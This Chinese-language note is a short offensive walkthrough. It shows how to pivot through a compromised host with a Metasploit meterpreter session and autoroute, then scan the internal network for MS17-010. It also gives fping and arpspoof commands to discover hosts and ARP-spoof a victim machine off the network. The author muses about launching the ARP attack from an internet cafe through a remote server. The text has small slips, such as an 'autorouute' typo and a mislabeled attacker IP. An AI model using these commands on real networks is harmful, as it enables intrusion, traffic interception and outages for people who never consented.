##titile :msf 代理内网机器后,进行内网其他网段机器的渗透
首先利用反弹木马返回meterpreter shell
利用这个shell 查该机器网段,及添加路由,为渗透其他的机器做准备
- run get_local_subnets //获取路由地址
- run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
- run autoroute -p //查看添加的路由
+run autorouute -d //删除添加的路由- background //挂载到后台运行
至此,我们成功的把路由网段给添加到msf中。backgroup让会话在后台运行,我们可以用ms17-010来扫描整个内网机子了。
在linux环境
ARP攻击的攻击原理
- ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
操作指令:
· fping -asg 网络号/子网掩码 # 查看内网在线主机
· arpspoof -i eth0 -t 目标IP 网关IP # ARP欺骗
- 1.取得 win 7 上的 ip 地址 和网关地址
如:
· ip地址: 192.168.135.131
· 网关地址: 192.168.135.2
查看同一局域网内当前在线的主机情况:
fping -asg 192.168.135.0/24
在查找到网内在线的主机后,就可以选择一个作为攻击的目标了,这里以 win7 为受害主机,攻击如下:
arpspoof -i eth0 -t 192.168.135.131(攻击机ip) 192.168.135.2(网关)
这样可以让目标机器无法联网通信。
但实际情况,如果我需要在网吧使用我远程服务器进行arp攻击的话,还需要进行本地的代理,让本地代理我的远程服务器这样使我的服务器处于同个网段。不然就只能带个u盘了